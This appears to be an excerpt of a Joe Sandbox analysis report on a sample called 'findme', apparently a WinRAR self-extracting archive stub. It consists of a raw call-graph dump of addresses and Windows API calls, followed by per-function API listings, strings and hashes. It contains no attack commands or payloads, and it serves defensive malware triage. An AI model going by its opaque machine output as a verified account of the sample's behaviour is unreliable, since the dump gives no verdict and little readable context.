24078 4c12c8 GetDlgItem EnableWindow 23869->24078 23870 4db195 23875 4db19e GetLastError 23870->23875 23876 4db1ac 23870->23876 23871->23795 23882 4cddd1 53 API calls 23871->23882 24076 4d9635 32 API calls 23872->24076 23873 4db78a 23877 4dbdf5 98 API calls 23873->23877 23875->23876 23881 4db227 23876->23881 23886 4db237 23876->23886 23887 4db1c4 GetTickCount 23876->23887 23877->23902 23879 4db86c 24079 4c12c8 GetDlgItem EnableWindow 23879->24079 23880->23871 23885 4db46c 23881->23885 23881->23886 23889 4db8b6 SetDlgItemTextW 23882->23889 23883 4db725 23883->23890 23979 4c12e6 GetDlgItem ShowWindow 23885->23979 23892 4db24f GetModuleFileNameW 23886->23892 23893 4db407 23886->23893 23894 4c400a _swprintf 51 API calls 23887->23894 23888 4db825 24077 4d9635 32 API calls 23888->24077 23889->23795 23890->23873 23897 4dbdf5 98 API calls 23890->23897 24070 4ceb3a 80 API calls 23892->24070 23893->23804 23906 4cddd1 53 API calls 23893->23906 23900 4db1dd 23894->23900 23896 4cddd1 53 API calls 23896->23902 23903 4db75f 23897->23903 23898 4db47c 23980 4c12e6 GetDlgItem ShowWindow 23898->23980 23971 4c971e 23900->23971 23901 4db844 23901->23859 23902->23859 23902->23888 23902->23896 23903->23873 23907 4db768 DialogBoxParamW 23903->23907 23905 4db275 23909 4c400a _swprintf 51 API calls 23905->23909 23910 4db41b 23906->23910 23907->23804 23907->23873 23908 4db486 23911 4cddd1 53 API calls 23908->23911 23912 4db297 CreateFileMappingW 23909->23912 23913 4c400a _swprintf 51 API calls 23910->23913 23915 4db490 SetDlgItemTextW 23911->23915 23916 4db2f9 GetCommandLineW 23912->23916 23947 4db376 __vsnwprintf_l 23912->23947 23917 4db439 23913->23917 23981 4c12e6 GetDlgItem ShowWindow 23915->23981 23921 4db30a 23916->23921 23930 4cddd1 53 API calls 23917->23930 23918 4db203 23922 4db215 23918->23922 23923 4db20a GetLastError 23918->23923 23919 4db381 ShellExecuteExW 23945 4db39e 23919->23945 24071 4dab2e SHGetMalloc 23921->24071 23926 4c9653 79 API calls 23922->23926 23923->23922 23924 
4db4a2 SetDlgItemTextW GetDlgItem 23927 4db4bf GetWindowLongW SetWindowLongW 23924->23927 23928 4db4d7 23924->23928 23926->23881 23927->23928 23982 4dbdf5 23928->23982 23929 4db326 24072 4dab2e SHGetMalloc 23929->24072 23930->23804 23934 4db332 24073 4dab2e SHGetMalloc 23934->24073 23935 4db3e1 23935->23893 23941 4db3f7 UnmapViewOfFile CloseHandle 23935->23941 23936 4dbdf5 98 API calls 23939 4db4f3 23936->23939 23938 4db33e 24074 4cecad 80 API calls ___scrt_fastfail 23938->24074 24007 4dd0f5 23939->24007 23941->23893 23944 4db355 MapViewOfFile 23944->23947 23945->23935 23948 4db3cd Sleep 23945->23948 23946 4dbdf5 98 API calls 23951 4db519 23946->23951 23947->23919 23948->23935 23948->23945 23949 4db542 24075 4c12c8 GetDlgItem EnableWindow 23949->24075 23951->23949 23953 4dbdf5 98 API calls 23951->23953 23952->23804 23952->23829 23953->23949 23955 4c136d 23954->23955 23956 4c1314 23954->23956 24081 4cda71 GetWindowLongW SetWindowLongW 23955->24081 23957 4c137a 23956->23957 24080 4cda98 62 API calls 2 library calls 23956->24080 23957->23795 23957->23796 23957->23797 23960 4c1336 23960->23957 23961 4c1349 GetDlgItem 23960->23961 23961->23957 23962 4c1359 23961->23962 23962->23957 23963 4c135f SetWindowTextW 23962->23963 23963->23957 23967 4ca059 23964->23967 23965 4ca113 23965->23860 23965->23861 23966 4ca0ea 23966->23965 23968 4ca207 9 API calls 23966->23968 23967->23965 23967->23966 24082 4ca207 23967->24082 23968->23965 23970->23870 23972 4c9728 23971->23972 23973 4c9792 CreateFileW 23972->23973 23974 4c9786 23972->23974 23973->23974 23975 4c97e4 23974->23975 23976 4cb66c 2 API calls 23974->23976 23975->23918 23977 4c97cb 23976->23977 23977->23975 23978 4c97cf CreateFileW 23977->23978 23978->23975 23979->23898 23980->23908 23981->23924 23983 4dbdff __EH_prolog 23982->23983 23984 4db4e5 23983->23984 24114 4daa36 23983->24114 23984->23936 23987 4daa36 ExpandEnvironmentStringsW 23994 4dbe36 _wcsrchr 23987->23994 23988 4dc11d SetWindowTextW 23988->23994 23993 4dbf0b 
SetFileAttributesW 23995 4dbfc5 GetFileAttributesW 23993->23995 24006 4dbf25 ___scrt_fastfail 23993->24006 23994->23984 23994->23987 23994->23988 23994->23993 23999 4dc2e7 GetDlgItem SetWindowTextW SendMessageW 23994->23999 24002 4dc327 SendMessageW 23994->24002 24118 4d17ac CompareStringW 23994->24118 24119 4d9da4 GetCurrentDirectoryW 23994->24119 24121 4ca52a 7 API calls 23994->24121 24122 4ca4b3 FindClose 23994->24122 24123 4dab9a 76 API calls new 23994->24123 24124 4e35de 23994->24124 23995->23994 23998 4dbfd7 DeleteFileW 23995->23998 23998->23994 24000 4dbfe8 23998->24000 23999->23994 24001 4c400a _swprintf 51 API calls 24000->24001 24003 4dc008 GetFileAttributesW 24001->24003 24002->23994 24003->24000 24004 4dc01d MoveFileW 24003->24004 24004->23994 24005 4dc035 MoveFileExW 24004->24005 24005->23994 24006->23994 24006->23995 24120 4cb4f7 52 API calls 2 library calls 24006->24120 24008 4dd0ff __EH_prolog 24007->24008 24139 4cfead 24008->24139 24010 4dd130 24143 4c5c59 24010->24143 24012 4dd14e 24147 4c7c68 24012->24147 24016 4dd1a1 24164 4c7cfb 24016->24164 24018 4db504 24018->23946 24020 4dcd38 24019->24020 24021 4d9d1a 4 API calls 24020->24021 24022 4dcd3d 24021->24022 24023 4dcd45 GetWindow 24022->24023 24024 4db5d1 24022->24024 24023->24024 24027 4dcd65 24023->24027 24024->23805 24024->23806 24025 4dcd72 GetClassNameW 24608 4d17ac CompareStringW 24025->24608 24027->24024 24027->24025 24028 4dcdfa GetWindow 24027->24028 24029 4dcd96 GetWindowLongW 24027->24029 24028->24024 24028->24027 24029->24028 24030 4dcda6 SendMessageW 24029->24030 24030->24028 24031 4dcdbc GetObjectW 24030->24031 24609 4d9d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24031->24609 24033 4dcdd3 24610 4d9d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24033->24610 24611 4d9f5d 8 API calls ___scrt_fastfail 24033->24611 24036 4dcde4 SendMessageW DeleteObject 24036->24028 24037->23816 24039 4da2e8 24038->24039 24044 4da30d 24038->24044 24612 4d17ac CompareStringW 24039->24612 24041 4da31b 
24046 4da7c3 24041->24046 24042 4da312 SHAutoComplete 24042->24041 24043 4da2fb 24043->24044 24045 4da2ff FindWindowExW 24043->24045 24044->24041 24044->24042 24045->24044 24047 4da7cd __EH_prolog 24046->24047 24048 4c1380 82 API calls 24047->24048 24049 4da7ef 24048->24049 24613 4c1f4f 24049->24613 24052 4da809 24055 4c1631 84 API calls 24052->24055 24053 4da818 24054 4c1951 126 API calls 24053->24054 24057 4da83a __vsnwprintf_l new 24054->24057 24056 4da814 24055->24056 24056->23845 24056->23850 24057->24056 24058 4c1631 84 API calls 24057->24058 24058->24056 24059->23828 24621 4dac74 PeekMessageW 24060->24621 24063 4dcbbc SendMessageW SendMessageW 24065 4dcbf8 24063->24065 24066 4dcc17 SendMessageW SendMessageW SendMessageW 24063->24066 24064 4dcb88 24067 4dcb93 ShowWindow SendMessageW SendMessageW 24064->24067 24065->24066 24068 4dcc6d SendMessageW 24066->24068 24069 4dcc4a SendMessageW 24066->24069 24067->24063 24068->23848 24069->24068 24070->23905 24071->23929 24072->23934 24073->23938 24074->23944 24075->23952 24076->23883 24077->23901 24078->23879 24079->23868 24080->23960 24081->23957 24083 4ca214 24082->24083 24084 4ca238 24083->24084 24085 4ca22b CreateDirectoryW 24083->24085 24103 4ca180 24084->24103 24085->24084 24087 4ca26b 24085->24087 24091 4ca27a 24087->24091 24095 4ca444 24087->24095 24089 4ca27e GetLastError 24089->24091 24091->23967 24092 4cb66c 2 API calls 24093 4ca254 24092->24093 24093->24089 24094 4ca258 CreateDirectoryW 24093->24094 24094->24087 24094->24089 24096 4de360 24095->24096 24097 4ca451 SetFileAttributesW 24096->24097 24098 4ca494 24097->24098 24099 4ca467 24097->24099 24098->24091 24100 4cb66c 2 API calls 24099->24100 24101 4ca47b 24100->24101 24101->24098 24102 4ca47f SetFileAttributesW 24101->24102 24102->24098 24106 4ca194 24103->24106 24107 4de360 24106->24107 24108 4ca1a1 GetFileAttributesW 24107->24108 24109 4ca189 24108->24109 24110 4ca1b2 24108->24110 24109->24089 24109->24092 24111 4cb66c 2 API calls 24110->24111 24112 
4ca1c6 24111->24112 24112->24109 24113 4ca1ca GetFileAttributesW 24112->24113 24113->24109 24115 4daa40 24114->24115 24116 4dab16 24115->24116 24117 4daaf3 ExpandEnvironmentStringsW 24115->24117 24116->23994 24117->24116 24118->23994 24119->23994 24120->24006 24121->23994 24122->23994 24123->23994 24125 4e8606 24124->24125 24126 4e861e 24125->24126 24127 4e8613 24125->24127 24128 4e8626 24126->24128 24135 4e862f __dosmaperr 24126->24135 24129 4e8518 __onexit 21 API calls 24127->24129 24130 4e84de _free 20 API calls 24128->24130 24133 4e861b 24129->24133 24130->24133 24131 4e8659 HeapReAlloc 24131->24133 24131->24135 24132 4e8634 24137 4e895a 20 API calls __dosmaperr 24132->24137 24133->23994 24135->24131 24135->24132 24138 4e71ad 7 API calls 2 library calls 24135->24138 24137->24133 24138->24135 24140 4cfeba 24139->24140 24168 4c1789 24140->24168 24142 4cfed2 24142->24010 24144 4cfead 24143->24144 24145 4c1789 76 API calls 24144->24145 24146 4cfed2 24145->24146 24146->24012 24148 4c7c72 __EH_prolog 24147->24148 24185 4cc827 24148->24185 24150 4c7c8d 24151 4de24a new 8 API calls 24150->24151 24152 4c7cb7 24151->24152 24191 4d440b 24152->24191 24155 4c7ddf 24156 4c7de9 24155->24156 24159 4c7e53 24156->24159 24220 4ca4c6 24156->24220 24158 4c7f06 24158->24016 24160 4c7ec4 24159->24160 24163 4ca4c6 8 API calls 24159->24163 24198 4c837f 24159->24198 24160->24158 24226 4c6dc1 74 API calls 24160->24226 24163->24159 24165 4c7d09 24164->24165 24167 4c7d10 24164->24167 24166 4d1acf 84 API calls 24165->24166 24166->24167 24169 4c179f 24168->24169 24180 4c17fa __vsnwprintf_l 24168->24180 24170 4c17c8 24169->24170 24181 4c6e91 74 API calls __vswprintf_c_l 24169->24181 24172 4c1827 24170->24172 24177 4c17e7 new 24170->24177 24174 4e35de 22 API calls 24172->24174 24173 4c17be 24182 4c6efd 75 API calls 24173->24182 24176 4c182e 24174->24176 24176->24180 24184 4c6efd 75 API calls 24176->24184 24177->24180 24183 4c6efd 75 API calls 24177->24183 24180->24142 24181->24173 24182->24170 
24183->24180 24184->24180 24186 4cc831 __EH_prolog 24185->24186 24187 4de24a new 8 API calls 24186->24187 24188 4cc874 24187->24188 24189 4de24a new 8 API calls 24188->24189 24190 4cc898 24189->24190 24190->24150 24192 4d4415 __EH_prolog 24191->24192 24193 4de24a new 8 API calls 24192->24193 24194 4d4431 24193->24194 24195 4c7ce6 24194->24195 24197 4d06ba 78 API calls 24194->24197 24195->24155 24197->24195 24199 4c8389 __EH_prolog 24198->24199 24227 4c1380 24199->24227 24201 4c83a4 24235 4c9ef7 24201->24235 24207 4c83d3 24358 4c1631 24207->24358 24208 4c846e 24254 4c8517 24208->24254 24211 4c84ce 24261 4c1f00 24211->24261 24215 4c83cf 24215->24207 24215->24208 24218 4ca4c6 8 API calls 24215->24218 24362 4cbac4 CompareStringW 24215->24362 24216 4c84d9 24216->24207 24265 4c3aac 24216->24265 24275 4c857b 24216->24275 24218->24215 24221 4ca4db 24220->24221 24222 4ca4df 24221->24222 24596 4ca5f4 24221->24596 24222->24156 24224 4ca4ef 24224->24222 24225 4ca4f4 FindClose 24224->24225 24225->24222 24226->24158 24228 4c1385 __EH_prolog 24227->24228 24229 4cc827 8 API calls 24228->24229 24230 4c13bd 24229->24230 24231 4de24a new 8 API calls 24230->24231 24234 4c1416 ___scrt_fastfail 24230->24234 24232 4c1403 24231->24232 24233 4cb07d 82 API calls 24232->24233 24232->24234 24233->24234 24234->24201 24236 4c9f0e 24235->24236 24237 4c83ba 24236->24237 24363 4c6f5d 76 API calls 24236->24363 24237->24207 24239 4c19a6 24237->24239 24240 4c19b0 __EH_prolog 24239->24240 24246 4c1a00 24240->24246 24250 4c19e5 24240->24250 24364 4c709d 24240->24364 24242 4c1b50 24367 4c6dc1 74 API calls 24242->24367 24244 4c3aac 97 API calls 24249 4c1bb3 24244->24249 24245 4c1b60 24245->24244 24245->24250 24246->24242 24246->24245 24246->24250 24247 4c1bff 24247->24250 24253 4c1c32 24247->24253 24368 4c6dc1 74 API calls 24247->24368 24249->24247 24251 4c3aac 97 API calls 24249->24251 24250->24215 24251->24249 24252 4c3aac 97 API calls 24252->24253 24253->24250 24253->24252 24255 4c8524 24254->24255 
24386 4d0c26 GetSystemTime SystemTimeToFileTime 24255->24386 24257 4c8488 24257->24211 24258 4d1359 24257->24258 24388 4dd51a 24258->24388 24262 4c1f05 __EH_prolog 24261->24262 24263 4c1f39 24262->24263 24396 4c1951 24262->24396 24263->24216 24266 4c3abc 24265->24266 24267 4c3ab8 24265->24267 24268 4c3ae9 24266->24268 24269 4c3af7 24266->24269 24267->24216 24270 4c3b29 24268->24270 24530 4c3281 85 API calls 3 library calls 24268->24530 24531 4c27e8 97 API calls 3 library calls 24269->24531 24270->24216 24273 4c3af5 24273->24270 24532 4c204e 74 API calls 24273->24532 24276 4c8585 __EH_prolog 24275->24276 24277 4c85be 24276->24277 24289 4c85c2 24276->24289 24555 4d84bd 99 API calls 24276->24555 24278 4c85e7 24277->24278 24283 4c867a 24277->24283 24277->24289 24280 4c8609 24278->24280 24278->24289 24556 4c7b66 151 API calls 24278->24556 24280->24289 24557 4d84bd 99 API calls 24280->24557 24283->24289 24533 4c5e3a 24283->24533 24285 4c8705 24285->24289 24539 4c826a 24285->24539 24288 4c8875 24290 4ca4c6 8 API calls 24288->24290 24292 4c88e0 24288->24292 24289->24216 24290->24292 24291 4cc991 80 API calls 24297 4c893b _memcmp 24291->24297 24543 4c7d6c 24292->24543 24294 4c8a70 24295 4c8b43 24294->24295 24301 4c8abf 24294->24301 24300 4c8b9e 24295->24300 24310 4c8b4e 24295->24310 24296 4c8a69 24560 4c1f94 74 API calls 24296->24560 24297->24289 24297->24291 24297->24294 24297->24296 24558 4c8236 82 API calls 24297->24558 24559 4c1f94 74 API calls 24297->24559 24309 4c8b30 24300->24309 24563 4c80ea 96 API calls 24300->24563 24303 4ca180 4 API calls 24301->24303 24301->24309 24302 4c8b9c 24304 4c9653 79 API calls 24302->24304 24307 4c8af7 24303->24307 24304->24289 24306 4c9653 79 API calls 24306->24289 24307->24309 24561 4c9377 96 API calls 24307->24561 24308 4c8c09 24312 4c9989 GetFileType 24308->24312 24321 4c8c74 24308->24321 24356 4c91c1 ___InternalCxxFrameHandler 24308->24356 24309->24302 24309->24308 24310->24302 24562 4c7f26 100 API calls ___InternalCxxFrameHandler 
24310->24562 24311 4caa88 8 API calls 24314 4c8cc3 24311->24314 24316 4c8c4c 24312->24316 24317 4caa88 8 API calls 24314->24317 24316->24321 24564 4c1f94 74 API calls 24316->24564 24330 4c8cd9 24317->24330 24319 4c8c62 24565 4c7061 75 API calls 24319->24565 24321->24311 24322 4c8d9c 24323 4c8efd 24322->24323 24324 4c8df7 24322->24324 24328 4c8f0f 24323->24328 24329 4c8f23 24323->24329 24345 4c8e27 24323->24345 24325 4c8e69 24324->24325 24327 4c8e07 24324->24327 24326 4c826a CharUpperW 24325->24326 24331 4c8e84 24326->24331 24332 4c8e4d 24327->24332 24338 4c8e15 24327->24338 24333 4c92e6 121 API calls 24328->24333 24334 4d2c42 75 API calls 24329->24334 24330->24322 24566 4c9b21 SetFilePointer GetLastError SetEndOfFile 24330->24566 24340 4c8ead 24331->24340 24341 4c8eb4 24331->24341 24331->24345 24332->24345 24568 4c7907 108 API calls 24332->24568 24333->24345 24336 4c8f3c 24334->24336 24571 4d28f1 121 API calls 24336->24571 24567 4c1f94 74 API calls 24338->24567 24569 4c7698 84 API calls ___InternalCxxFrameHandler 24340->24569 24570 4c9224 94 API calls __EH_prolog 24341->24570 24349 4c904b 24345->24349 24572 4c1f94 74 API calls 24345->24572 24347 4c9104 24550 4c9d62 24347->24550 24348 4ca444 4 API calls 24350 4c91b1 24348->24350 24349->24347 24349->24356 24357 4c9156 24349->24357 24549 4c9ebf SetEndOfFile 24349->24549 24350->24356 24573 4c1f94 74 API calls 24350->24573 24353 4c914b 24355 4c96d0 75 API calls 24353->24355 24355->24357 24356->24306 24357->24348 24357->24356 24359 4c1643 24358->24359 24588 4cc8ca 24359->24588 24362->24215 24363->24237 24369 4c16d2 24364->24369 24366 4c70b9 24366->24246 24367->24250 24368->24253 24370 4c16e8 24369->24370 24380 4c1740 __vsnwprintf_l 24369->24380 24371 4c1711 24370->24371 24382 4c6e91 74 API calls __vswprintf_c_l 24370->24382 24373 4c1767 24371->24373 24378 4c172d new 24371->24378 24375 4e35de 22 API calls 24373->24375 24374 4c1707 24383 4c6efd 75 API calls 24374->24383 24377 4c176e 24375->24377 24377->24380 24385 4c6efd 
75 API calls 24377->24385 24378->24380 24384 4c6efd 75 API calls 24378->24384 24380->24366 24382->24374 24383->24371 24384->24380 24385->24380 24387 4d0c56 __vsnwprintf_l 24386->24387 24387->24257 24389 4dd527 24388->24389 24390 4cddd1 53 API calls 24389->24390 24391 4dd54a 24390->24391 24392 4c400a _swprintf 51 API calls 24391->24392 24393 4dd55c 24392->24393 24394 4dcb5a 16 API calls 24393->24394 24395 4d1372 24394->24395 24395->24211 24397 4c1961 24396->24397 24399 4c195d 24396->24399 24400 4c1896 24397->24400 24399->24263 24401 4c18a8 24400->24401 24402 4c18e5 24400->24402 24403 4c3aac 97 API calls 24401->24403 24408 4c3f18 24402->24408 24406 4c18c8 24403->24406 24406->24399 24410 4c3f21 24408->24410 24409 4c3aac 97 API calls 24409->24410 24410->24409 24412 4c1906 24410->24412 24425 4d067c 24410->24425 24412->24406 24413 4c1e00 24412->24413 24414 4c1e0a __EH_prolog 24413->24414 24433 4c3b3d 24414->24433 24416 4c1e34 24417 4c1ebb 24416->24417 24418 4c16d2 76 API calls 24416->24418 24417->24406 24419 4c1e4b 24418->24419 24461 4c1849 76 API calls 24419->24461 24421 4c1e63 24423 4c1e6f 24421->24423 24462 4d137a MultiByteToWideChar 24421->24462 24463 4c1849 76 API calls 24423->24463 24427 4d0683 24425->24427 24426 4d069e 24429 4d06af SetThreadExecutionState 24426->24429 24432 4c6e8c RaiseException __CxxThrowException@8 24426->24432 24427->24426 24431 4c6e8c RaiseException __CxxThrowException@8 24427->24431 24429->24410 24431->24426 24432->24429 24434 4c3b47 __EH_prolog 24433->24434 24435 4c3b5d 24434->24435 24436 4c3b79 24434->24436 24492 4c6dc1 74 API calls 24435->24492 24437 4c3dc2 24436->24437 24441 4c3ba5 24436->24441 24509 4c6dc1 74 API calls 24437->24509 24440 4c3b68 24440->24416 24441->24440 24464 4d2c42 24441->24464 24443 4c3c26 24444 4c3cb1 24443->24444 24460 4c3c1d 24443->24460 24495 4cc991 24443->24495 24477 4caa88 24444->24477 24445 4c3c22 24445->24443 24494 4c2034 76 API calls 24445->24494 24447 4c3bf4 24447->24443 24447->24445 24448 4c3c12 24447->24448 

                    Control-flow Graph

                    APIs
                      • Part of subcall function 004D00CF: GetModuleHandleW.KERNEL32(kernel32), ref: 004D00E4
                      • Part of subcall function 004D00CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 004D00F6
                      • Part of subcall function 004D00CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 004D0127
                      • Part of subcall function 004D9DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 004D9DAC
                      • Part of subcall function 004DA335: OleInitialize.OLE32(00000000), ref: 004DA34E
                      • Part of subcall function 004DA335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 004DA385
                      • Part of subcall function 004DA335: SHGetMalloc.SHELL32(00508430), ref: 004DA38F
                      • Part of subcall function 004D13B3: GetCPInfo.KERNEL32(00000000,?), ref: 004D13C4
                      • Part of subcall function 004D13B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 004D13D8
                    • GetCommandLineW.KERNEL32 ref: 004DD61C
                    • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 004DD643
                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 004DD654
                    • UnmapViewOfFile.KERNEL32(00000000), ref: 004DD68E
                      • Part of subcall function 004DD287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 004DD29D
                      • Part of subcall function 004DD287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 004DD2D9
                    • CloseHandle.KERNEL32(00000000), ref: 004DD697
                    • GetModuleFileNameW.KERNEL32(00000000,0051DC90,00000800), ref: 004DD6B2
                    • SetEnvironmentVariableW.KERNEL32(sfxname,0051DC90), ref: 004DD6BE
                    • GetLocalTime.KERNEL32(?), ref: 004DD6C9
                    • _swprintf.LIBCMT ref: 004DD708
                    • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 004DD71A
                    • GetModuleHandleW.KERNEL32(00000000), ref: 004DD721
                    • LoadIconW.USER32(00000000,00000064), ref: 004DD738
                    • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 004DD789
                    • Sleep.KERNEL32(?), ref: 004DD7B7
                    • DeleteObject.GDI32 ref: 004DD7F0
                    • DeleteObject.GDI32(?), ref: 004DD800
                    • CloseHandle.KERNEL32 ref: 004DD843
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                    • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xjQ
                    • API String ID: 788466649-414108644
                    • Opcode ID: c15cd20c872da9d6894c3ee8e2ad1fd030cf93d5452b753f6b654ac1779f7209
                    • Instruction ID: c0839946cf09a0977f3c9278d8ad0cd0f8800795f8235ef77e99927a04240ab9
                    • Opcode Fuzzy Hash: c15cd20c872da9d6894c3ee8e2ad1fd030cf93d5452b753f6b654ac1779f7209
                    • Instruction Fuzzy Hash: AA61C371904241AFD720AF62EC59F7B3BA8BB55709F00042FF94592391DF7C8908E7AA

                    Control-flow Graph

                    APIs
                    • FindResourceW.KERNEL32(004DAE4D,PNG,?,?,?,004DAE4D,00000066), ref: 004D9E2E
                    • SizeofResource.KERNEL32(00000000,00000000,?,?,?,004DAE4D,00000066), ref: 004D9E46
                    • LoadResource.KERNEL32(00000000,?,?,?,004DAE4D,00000066), ref: 004D9E59
                    • LockResource.KERNEL32(00000000,?,?,?,004DAE4D,00000066), ref: 004D9E64
                    • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,004DAE4D,00000066), ref: 004D9E82
                    • GlobalLock.KERNEL32(00000000), ref: 004D9E93
                    • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 004D9EB7
                    • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 004D9EFC
                    • GlobalUnlock.KERNEL32(00000000), ref: 004D9F1B
                    • GlobalFree.KERNEL32(00000000), ref: 004D9F22
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
                    • String ID: PNG
                    • API String ID: 3656887471-364855578
                    • Opcode ID: 45022d65e5181718567d77983882867527b0c31fc0af38627596db5bffa441cc
                    • Instruction ID: eed9491eb34e78a7319373fac980ce6a4c9e04edb097c56ae0d9a1eecced45d7
                    • Opcode Fuzzy Hash: 45022d65e5181718567d77983882867527b0c31fc0af38627596db5bffa441cc
                    • Instruction Fuzzy Hash: 41319F71204706AFC7109F61DC58A2BBBADFF99752B04092FF906D2360EB35DC10DAA9

                    Control-flow Graph

                    APIs
                    • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,004CA4EF,000000FF,?,?), ref: 004CA628
                    • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,004CA4EF,000000FF,?,?), ref: 004CA65E
                    • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,004CA4EF,000000FF,?,?), ref: 004CA66A
                    • FindNextFileW.KERNEL32(?,?,?,?,?,?,004CA4EF,000000FF,?,?), ref: 004CA692
                    • GetLastError.KERNEL32(?,?,?,?,004CA4EF,000000FF,?,?), ref: 004CA69E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: FileFind$ErrorFirstLast$Next
                    • String ID:
                    • API String ID: 869497890-0
                    • Opcode ID: 19e426b5d8a8e044277fa6e3b2de332a114b3f48a1d46cd4faeaaf07d980b501
                    • Instruction ID: f945405c9babf90bdaee574cc3be0c352191bc5f2e40214835b2d39476923822
                    • Opcode Fuzzy Hash: 19e426b5d8a8e044277fa6e3b2de332a114b3f48a1d46cd4faeaaf07d980b501
                    • Instruction Fuzzy Hash: DD414175604645AFC364EF68C884ADBF7E8BB48344F04092FF5D9D3240D778A9648B96
                    APIs
                    • GetCurrentProcess.KERNEL32(00000000,?,004E7513,00000000,004FBAD8,0000000C,004E766A,00000000,00000002,00000000), ref: 004E755E
                    • TerminateProcess.KERNEL32(00000000,?,004E7513,00000000,004FBAD8,0000000C,004E766A,00000000,00000002,00000000), ref: 004E7565
                    • ExitProcess.KERNEL32 ref: 004E7577
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: Process$CurrentExitTerminate
                    • String ID:
                    • API String ID: 1703294689-0
                    • Opcode ID: 8b836b35bee10b1a4236200216402ce863bd320584c310fedc36eeabb44f929b
                    • Instruction ID: 6ab8af859084be70304be51d2b7ac1fd3e36db93b203cbf8e1b61aa311892b27
                    • Opcode Fuzzy Hash: 8b836b35bee10b1a4236200216402ce863bd320584c310fedc36eeabb44f929b
